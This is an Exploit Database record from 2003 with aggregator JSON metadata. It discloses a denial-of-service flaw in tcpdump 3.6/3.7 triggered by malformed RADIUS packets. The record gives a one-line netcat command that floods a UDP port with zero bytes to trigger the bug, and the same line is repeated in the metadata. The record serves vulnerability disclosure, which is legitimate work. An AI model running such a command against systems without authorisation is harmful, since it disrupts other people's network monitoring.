TCPDump 3.6/3.7 Malformed RADIUS Packet Denial of Service Vulnerability
2003-03-14T00:00:00
ID EDB-ID:22352 Type exploitdb Reporter Bill Ralph Modified 2003-03-14T00:00:00
Description
TCPDump 3.6/3.7 Malformed RADIUS Packet Denial Of Service Vulnerability. Dos exploit for linux platform
source: http://www.securityfocus.com/bid/7090/info
It has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted.
nc -u -p 1646 127.0.0.1 1301 < /dev/zero
{"id": "EDB-ID:22352", "hash": "5ed93cca3a9c9f40e00d64fb8805e7d1", "type": "exploitdb", "bulletinFamily": "exploit", "title": "TCPDump 3.6/3.7 Malformed RADIUS Packet Denial of Service Vulnerability", "description": "TCPDump 3.6/3.7 Malformed RADIUS Packet Denial Of Service Vulnerability. Dos exploit for linux platform", "published": "2003-03-14T00:00:00", "modified": "2003-03-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/22352/", "reporter": "Bill Ralph", "references": [], "cvelist": [], "lastseen": "2016-02-02T18:33:25", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-02-02T18:33:25"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/22352/", "sourceData": "source: http://www.securityfocus.com/bid/7090/info\r\n\r\nIt has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted.\r\n\r\nnc -u -p 1646 127.0.0.1 1301 < /dev/zero", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}